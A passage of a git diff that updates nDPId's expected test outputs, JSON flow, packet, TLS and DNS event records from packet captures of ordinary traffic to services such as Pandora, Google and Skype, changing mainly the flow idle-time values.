{"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646568788171,"flow_last_seen":1646568788171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646568788171,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1646568788171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788171,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8AQRAAEAGfpzAqAGA0FUontLaAbs4n4KKAAAAAKAC+vB1NgAAAgQFtAQCCArSjLpwAAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1646568788337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788337,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Ke1AAPAGpbLQVSiewKgBgAG70tpN2CtOOJ+Ci6ASOQiNqgAAAgQFtAEDAwAEAggKXyXRHtKMunA="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1646568788341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646568788341,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5AQZAAEAGfJ3AqAGA0FUontLaAbs4n4KLTdgrT4AYAfYOtAAAAQEICtKMuxtfJdEeFgMBAgABAAH8AwNyi5pZnYizmESRNRsWFzLDUgF4AIT\/tX3zYbufDRkzzyDMV\/FK528iuv6PxN\/1DD4BU1TMzFBPBIF01ZAvPFWIVwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtwYW5kb3JhLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBUk5TxRwMmI7m3PUpmyv2jiTq1G62x80KdY2tfOvxfVgAXAEEEr8O4oznU2jNZk5ZC+\/pUpJeqcDtGn2NikTZa2J69CfKpIdzohOHLj9fffI5zTez3ppU6JIFTO2\/VBVQmSVbRwwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495785326,"flow_last_seen":1646495785351,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495837086,"flow_last_seen":1646495837102,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":520,"packets-processed":520,"total-skipped-flows":0,"total-l4-data-len":238171,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":43,"total-detection-updates":49,"total-updates":0,"current-active-flows":0,"total-active-flows":47,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":338,"global_ts_msec":1646568788847} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 520/520 diff --git a/test/results/skype.pcap.out b/test/results/skype.pcap.out index ed3b25e44..6662d8c1d 100644 --- a/test/results/skype.pcap.out +++ b/test/results/skype.pcap.out @@ -24,8 +24,8 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431969642334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431969642334,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAnAAAEAR9LLAqAEiwKgBAeU5ADUAQzJbSPEBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642336,"flow_last_seen":1431969642336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642336,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431969642336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642336,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5NNAAEAGc8HAqAEiQTffIcNqnEKAlL6TAAAAALAC\/\/\/spQAAAgQFtAEDAwUBAQgKPiKLPAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642336,"flow_last_seen":1431969642336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642336,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431969642336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642336,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5NNAAEAGc8HAqAEiQTffIcNqnEKAlL6TAAAAALAC\/\/\/spQAAAgQFtAEDAwUBAQgKPiKLPAAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+t\/gAAEARP0PAqAEiwKgBAcKBADUAKu5ghe0BAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAAAEAAQ=="} 